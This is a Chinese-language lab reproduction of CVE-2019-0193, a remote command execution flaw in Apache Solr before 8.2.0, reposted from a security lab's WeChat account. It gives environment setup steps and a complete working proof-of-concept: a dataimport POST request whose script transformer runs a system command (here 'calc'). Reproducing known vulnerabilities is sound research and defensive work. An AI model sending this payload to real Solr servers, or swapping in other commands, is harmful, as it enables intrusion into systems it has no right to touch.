漏洞环境
链接:https://pan.baidu.com/s/1kHkacMz-_K4wLw1esHiOQQ
提取码:gddk
漏洞危害
执行系统命令
影响范围
Apache Solr < 8.2.0
漏洞复现
下载漏洞环境,解压,进入到solr-7.7.2目录下,在当前目录下执行命令
.binsolr.cmd -e dih
然后打开浏览器访问127.0.0.1:8983
点开Core Admin获取所有的core信息然后随意选择一个,这里我选择的是mail
抓取当前页面的请求包,替换完整POC,这里需要注意的是红框里的core是你选择的core要保持一致
弹出目标系统的计算器
复现成功
完整的POC:
POST /solr/mail/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=mail&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
原文始发于微信公众号(赛瑞攻防实验室):CVE-2019-0193:Apache Solr 远程命令执行漏洞复现
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论